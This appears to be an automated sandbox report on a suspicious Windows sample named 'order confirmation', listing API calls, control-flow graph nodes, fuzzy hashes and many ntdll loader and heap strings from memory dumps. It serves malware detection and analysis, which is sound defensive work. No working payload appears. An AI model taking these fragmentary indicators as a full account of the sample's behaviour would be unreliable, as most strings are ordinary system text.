                                                    • Instruction ID: 2c93fbf58faf19b7145b43889d661f3b69fec038b2ff8a571458cfb118ad8616
                                                    • Opcode Fuzzy Hash: b45cae07c9c219c099e0826546d53defafec1ad3bdbe238061a0a9cc026b5f1f
                                                    • Instruction Fuzzy Hash: 4A110431E4021876EF219AA1AC42FEF7F789F81754F448059FA04BB281DAB856068BE5

                                                    Control-flow Graph
                                                    control_flow_graph 14 4144a3-4144b3 15 4144bc-414511 call 42f623 call 417c23 call 4047f3 call 425223 14->15 16 4144b7 call 42ec13 14->16 25 414533-414538 15->25 26 414513-414524 PostThreadMessageW 15->26 16->15 26->25 27 414526-414530 26->27 27->25
                                                    APIs
                                                    • PostThreadMessageW.USER32(sE716IK71M,00000111,00000000,00000000), ref: 00414520
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: sE716IK71M$sE716IK71M
                                                    • API String ID: 1836367815-922563818
                                                    • Opcode ID: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction ID: 8504cfec16b6aedebdd5f95c05872cee6fb7df1a624910d20b6db10e5d894ebc
                                                    • Opcode Fuzzy Hash: 3de012e5431b6b67fac50700b1926275c7c37100b9222c36437f17da7e8deb27
                                                    • Instruction Fuzzy Hash: 4C01D671E4021876EB2196A1AD02FDF7B7C9F41B54F444059FB047B2C1EBB86A068BE5

                                                    Control-flow Graph
                                                    control_flow_graph 28 42ce33-42ce77 call 404883 call 42dd13 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CE72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID: qiA
                                                    • API String ID: 3298025750-529955485
                                                    • Opcode ID: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction ID: 307251ad091670c87d9754cbc308c92c0932808cc59762c095a9376aec0cd4cc
                                                    • Opcode Fuzzy Hash: e3b5d95ba1a83d426d625c5e4c7fafcd7ca98a1b0cb9b90bc850c9ae22092b0e
                                                    • Instruction Fuzzy Hash: 0CE06D722042547BCB14EE99DC41EDB37ACEFC9714F00442EF909A7241C770B91086B5

                                                    Control-flow Graph
                                                    control_flow_graph 42 417cdf-417d05 43 417d06-417d07 42->43 44 417d09-417d18 43->44 45 417d6c-417d6e 43->45 48 417d1a-417d45 44->48 49 417ccf-417cdb 44->49 46 417d70-417d81 45->46 47 417dbe-417dde call 42ba63 45->47 48->43 59 417d47-417d48 48->59 56 417c83-417c97 LdrLoadDll 49->56 57 417c9a-417c9d 49->57 56->57 59->45
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0

Control-flow Graph

APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
Memory Dump Source
• Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

Control-flow Graph

APIs
• RtlAllocateHeap.NTDLL(?,0041E9BA,?,?,00000000,?,0041E9BA,?,?,?), ref: 0042CE22
Memory Dump Source
• Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

Control-flow Graph

APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,07461022,?,?,07461022), ref: 0042CEBA
Memory Dump Source
• Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0

Control-flow Graph

APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
Memory Dump Source
• Source File: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_order confirmation.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Strings
• Critical section debug info address, xrefs: 0142541F, 0142552E
• Critical section address., xrefs: 01425502
• Address of the debug info found in the active list., xrefs: 014254AE, 014254FA
• undeleted critical section in freed memory, xrefs: 0142542B
• corrupted critical section, xrefs: 014254C2
• Invalid debug info address of this critical section, xrefs: 014254B6
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254E2
• Thread is in a state in which it cannot own a critical section, xrefs: 01425543
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014254CE
• Thread identifier, xrefs: 0142553A
• double initialized or corrupted critical section, xrefs: 01425508
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0142540A, 01425496, 01425519
• Critical section address, xrefs: 01425425, 014254BC, 01425534
• 8, xrefs: 014252E3
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
• RtlpResolveAssemblyStorageMapEntry, xrefs: 0142261F
• @, xrefs: 0142259B
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014224C0
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014225EB
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01422624
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01422498
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014222E4
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422409
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422506
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01422602
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01422412
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
• API String ID: 0-3197712848
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• VerifierDlls, xrefs: 01438CBD
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01438A67
• AVRF: -*- final list of providers -*- , xrefs: 01438B8F
• HandleTraces, xrefs: 01438C8F
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01438A3D
• VerifierDebug, xrefs: 01438CA5
• VerifierFlags, xrefs: 01438C50
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01409A2A
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01409A01
• minkernel\ntdll\ldrinit.c, xrefs: 01409A11, 01409A3A
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014099ED
• LdrpInitShimEngine, xrefs: 014099F4, 01409A07, 01409A30
• apphelp.dll, xrefs: 013A6496
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• SXS: %s() passed the empty activation context, xrefs: 01422165
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01422180
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01422178
• RtlGetAssemblyStorageRoot, xrefs: 01422160, 0142219A, 014221BA
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0142219F
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014221BF
Memory Dump Source
• Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
                                                    • Opcode ID: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                    • Instruction ID: 5523fcaa874cd9d55230a0417abaf794f573fa0cd0227e9bd89247498ac59d93
                                                    • Opcode Fuzzy Hash: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                    • Instruction Fuzzy Hash: 0B313936F4033577FB218A9A8C45F6B7BACDF64A58F05005AFA04BB291D2B09E41C6A1
                                                    Strings
                                                    • LdrpInitializeImportRedirection, xrefs: 01428177, 014281EB
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013EC6C3
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01428181, 014281F5
                                                    • LdrpInitializeProcess, xrefs: 013EC6C4
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 014281E5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01428170
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                    • Instruction ID: bc66af30df15fe2683c011b7f095ae17b9ccc6208e0521724b004746008db3e0
                                                    • Opcode Fuzzy Hash: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                    • Instruction Fuzzy Hash: B531E4B26443569BD220EF2DD946E2BBBD4EF94B18F45051CF9446B3A1E620EC04CBA2
                                                    APIs
                                                      • Part of subcall function 013F2DF0: LdrInitializeThunk.NTDLL ref: 013F2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D74
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                    • Instruction ID: 95064021abcbbb89d8f8d15a8c51d978bd46a1facedf6e485f249edd66e077aa
                                                    • Opcode Fuzzy Hash: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                    • Instruction Fuzzy Hash: 90424B71900715DFDB25CF28C880BAAB7F5BF04318F1445AEEA99AB352D770A984CF60
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                    • Instruction ID: 786604cfd91ef9c855d166213a8a5669a2d7753fcbfdd1baf2431fbf1c35e263
                                                    • Opcode Fuzzy Hash: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                    • Instruction Fuzzy Hash: 7AC16A7410878ACFD711CF58C080BAAB7E4BB84708F04496AFA95DBB51F778CA49CB56
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
                                                    • LdrpInitializeProcess, xrefs: 013E8422
                                                    • @, xrefs: 013E8591
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                    • Instruction ID: fc50f15fddd6381689740081e8451f6f036be5922e6e8d3ca65fa3d17cf65974
                                                    • Opcode Fuzzy Hash: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                    • Instruction Fuzzy Hash: 63919A71908355EFD721EF69CC44EABBAECFF84748F40096EFA8496190E734D9448B62
                                                    Strings
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014222B6
                                                    • SXS: %s() passed the empty activation context, xrefs: 014221DE
                                                    • .Local, xrefs: 013E28D8
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014221D9, 014222B1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                    • Instruction ID: e1a0b6cd52d46b42af37f3dee4988a6be70eb31baf76a05147e1c3bfc334bb58
                                                    • Opcode Fuzzy Hash: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                    • Instruction Fuzzy Hash: 25A183319003399BDB25CF58D888B9AB7B5BF59358F1541EAE908A7391D7709EC0CF90
                                                    Strings
                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0142342A
                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423456
                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423437
                                                    • RtlDeactivateActivationContext, xrefs: 01423425, 01423432, 01423451
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                    • API String ID: 0-1245972979
                                                    • Opcode ID: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                    • Instruction ID: 8ec844b213c402d6f55c366715105a7f6bbad33d8c810a2cf7499112c29e9413
                                                    • Opcode Fuzzy Hash: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                    • Instruction Fuzzy Hash: 756147326007229BDB22CF1DC845B2AB7E5BF88B18F54816EE955DB390D734E841CB91
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410FE5
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0141106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01411028
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014110AE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                    • Instruction ID: b6854c4a416066802ad0b25e7b817aa1289030598e58b64493807b97f814f4b2
                                                    • Opcode Fuzzy Hash: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                    • Instruction Fuzzy Hash: 5E71CFB1904305DFCB21DF19C8C5B977FA8AF94758F40046AFA488B697E335D588CB92
                                                    Strings
                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142362F
                                                    • LdrpFindDllActivationContext, xrefs: 01423636, 01423662
                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 0142365C
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01423640, 0142366C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 0-3779518884
                                                    • Opcode ID: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                    • Instruction ID: 262d3a634e2cbc6245b7d0e49287569a6a14162499966488d552cf9627a1719b
                                                    • Opcode Fuzzy Hash: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                    • Instruction Fuzzy Hash: 5F310B219003319ADF329A0CC84DB77BAF4BB4965CF46412AE604D76E3D7A6DC8087D5
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0141A9A2
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A992
                                                    • LdrpDynamicShimModule, xrefs: 0141A998
                                                    • apphelp.dll, xrefs: 013D2462
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                    • Instruction ID: f31e2a0ef6dd542db875b145ab37a9786803d8409e4e824e4c1efa6a6e8c1bb4
                                                    • Opcode Fuzzy Hash: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                    • Instruction Fuzzy Hash: DF315B76601241ABDB319F5DD881E6BBFB9FB84B04F67401EE9016B379D7705881CB80
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 013C3255
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C327D
                                                    • HEAP: , xrefs: 013C3264
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                    • Instruction ID: 76ed8596c1c6a6249a69e2b9db95741bc66af172ca1487e14d3896f5845acf40
                                                    • Opcode Fuzzy Hash: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                    • Instruction Fuzzy Hash: 8E92B971A042499FEB25CF68C4407AEBBF1FF48B18F18806DE84AAB691D735AD45CF50
                                                    Strings
                                                    Memory Dump Source
